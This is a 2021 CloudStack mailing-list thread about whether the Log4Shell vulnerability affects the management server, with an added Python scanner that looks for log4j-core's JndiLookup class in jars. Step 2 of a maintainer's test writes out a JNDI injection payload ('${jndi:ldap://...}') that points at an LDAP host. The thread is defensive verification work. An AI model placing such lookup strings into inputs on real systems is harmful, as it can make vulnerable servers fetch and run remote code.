Hi Serge,

We've just posted the advisory which refers to log4j developer's note and slf4j 
project advisory. In addition, I performed the following test:

1. To test the log4j RCE/CVE, I found a resource whose name is printed by a logger, 
such as:
https://github.com/apache/cloudstack/blob/main/server/src/main/java/org/apache/cloudstack/affinity/AffinityGroupServiceImpl.java#L164

2. I created the resource, an affinity group with name 
"${jndi:ldap://192.168.1.10/a}" and tailed my webserver 
running on 192.168.1.10. The following was in CloudStack logs:
2021-12-11 08:39:46,265 DEBUG [o.a.c.a.AffinityGroupServiceImpl] 
(qtp1263668904-12808:ctx-d26b3d51 ctx-618e7d31) (logid:19557a1b) Created 
affinity group =${jndi:ldap://192.168.1.10/a}

However, the webserver logs have no errors or access requests on the /a path.

3. Upon unzipping the 4.15.2 and 4.16.0 mgmt server jars, I didn't find the 
Jndi lookup class:
root@cloudpi:/usr/share/cloudstack-management/lib/tmp# find . | grep JndiLookup
./org/springframework/ejb/config/JndiLookupBeanDefinitionParser.class
./org/springframework/jndi/JndiLookupFailureException.class


Regards.
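
A scanner for the check in step 3, added here as an example; it is not part of the mail above or of the CloudStack project. It matches the full class path of log4j-core's JndiLookup (so Spring's JndiLookupBeanDefinitionParser, which a plain `grep JndiLookup` also hits, is not reported), reads the log4j-core version from its pom.properties, and descends into nested jars/wars/ears, which unpacking only the top-level jar would miss. The archive names and the 2.14.1 version built in demo() are constructed sample data, not real CloudStack artifacts.

```python
"""Scan jars (including nested jars/wars) for log4j-core's JndiLookup class.

Added example, not CloudStack project code. The archives in demo() are
constructed in memory so the script runs offline; names and versions there
are illustrative only.
"""
import io
import re
import sys
import zipfile

# Exact entry names to match. `find . | grep JndiLookup` also hits Spring's
# JndiLookupBeanDefinitionParser, so compare the whole path instead.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
LOG4J1_MARKER = "org/apache/log4j/Logger.class"
LOG4J2_CORE_POM = re.compile(
    r"META-INF/maven/org\.apache\.logging\.log4j/log4j-core/pom\.properties$")
NESTED = (".jar", ".war", ".ear", ".zip")


def scan_archive(data, path="<archive>", depth=0, max_depth=5):
    """Return [(location, finding), ...] for an archive held in memory.

    Nested archives are opened recursively; location is "outer!inner" so a
    finding inside a jar inside a war is still attributable.
    """
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        for info in zf.infolist():
            name = info.filename
            if name == JNDI_LOOKUP:
                findings.append((path, "log4j-core JndiLookup.class present"))
            elif name == LOG4J1_MARKER:
                findings.append((path, "log4j 1.x classes present"))
            elif LOG4J2_CORE_POM.search(name):
                props = zf.read(name).decode("utf-8", "replace")
                m = re.search(r"^version=(.*)$", props, re.M)
                ver = m.group(1).strip() if m else "unknown"
                findings.append((path, "log4j-core " + ver))
            elif name.lower().endswith(NESTED) and depth < max_depth:
                findings.extend(scan_archive(zf.read(name), path + "!" + name,
                                             depth + 1, max_depth))
    return findings


def scan_file(file_path):
    """Scan one archive on disk (e.g. a cloudstack-management lib jar)."""
    with open(file_path, "rb") as f:
        return scan_archive(f.read(), file_path)


def _make_jar(entries):
    """Build a zip in memory from {entry_name: bytes} (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def demo():
    """Two constructed archives: a log4j-1.x-only jar shaped like the find
    output in the mail above, and a war bundling a log4j-core 2.x jar."""
    stub = b"\xca\xfe\xba\xbe"  # class-file magic; content is irrelevant here
    log4j1_only = _make_jar({
        LOG4J1_MARKER: stub,
        "org/springframework/ejb/config/JndiLookupBeanDefinitionParser.class": stub,
        "org/springframework/jndi/JndiLookupFailureException.class": stub,
    })
    log4j_core = _make_jar({
        JNDI_LOOKUP: stub,
        "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties":
            b"version=2.14.1\ngroupId=org.apache.logging.log4j\n"
            b"artifactId=log4j-core\n",
    })
    bundled_war = _make_jar({"WEB-INF/lib/log4j-core-2.14.1.jar": log4j_core})
    return {
        "mgmt-server.jar": scan_archive(log4j1_only, "mgmt-server.jar"),
        "app.war": scan_archive(bundled_war, "app.war"),
    }


if __name__ == "__main__":
    targets = sys.argv[1:]
    results = {p: scan_file(p) for p in targets} if targets else demo()
    for location, found in results.items():
        for where, what in found or [(location, "nothing log4j-related found")]:
            print(where, "->", what)
```

Run it with jar paths as arguments to scan real files (for example every jar under /usr/share/cloudstack-management/lib); with no arguments it scans the two constructed archives. A hit on "log4j 1.x classes present" with no log4j-core entry is what a management server pinned to log4j 1.2.17 should show.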

________________________________
From: Bs Serge <sergeb...@gmail.com>
Sent: Monday, December 13, 2021 15:17
To: users@cloudstack.apache.org <users@cloudstack.apache.org>
Subject: Re: Log4j in Cloudstack

Daan,
Thanks for the update, I can see the default log4j configuration uses
1.2.27:

<!-- Logging versions -->
<cs.log4j.version>1.2.17</cs.log4j.version>
<cs.log4j.extras.version>1.2.17</cs.log4j.extras.version>
<cs.logging.version>1.1.1</cs.logging.version>

We'll be waiting for the official statement.

Best Regards,

On Mon, Dec 13, 2021 at 11:12 AM Daan Hoogland <daan.hoogl...@gmail.com>
wrote:

> Serge,
> An official statement should be coming out soon, but I think it is safe to
> say the ACS is not impacted, for sure with the default log4j configuration.
> The version we use is not impacted. A colleague PMC member did an exploit
> attempt and showed it failing. If you are unsure [1] describes what we feel
> is applicable to Cloudstack as well.
>
> [1] http://slf4j.org/log4shell.html
>


> On Mon, Dec 13, 2021 at 9:55 AM Bs Serge <sergeb...@gmail.com> wrote:
>
> > Hi all,
> >
> > I’m sure all of you are aware of what’s going with the Log4j security
> > vulnerability, If not then :
> >
> > - https://www.wired.com/story/log4j-flaw-hacking-internet/
> > - https://logging-apache-org.translate.goog/log4j/2.x/security.html?_x_tr_sl=de&_x_tr_tl=en&_x_tr_hl=en-US
> >
> > So some of us are wondering :
> >
> > Does it affect some versions of the management server installation? and
> > What can one do to make sure that they are safe from this vulnerability?
> >
> > Best Regards,
> >
>
>
> --
> Daan
>
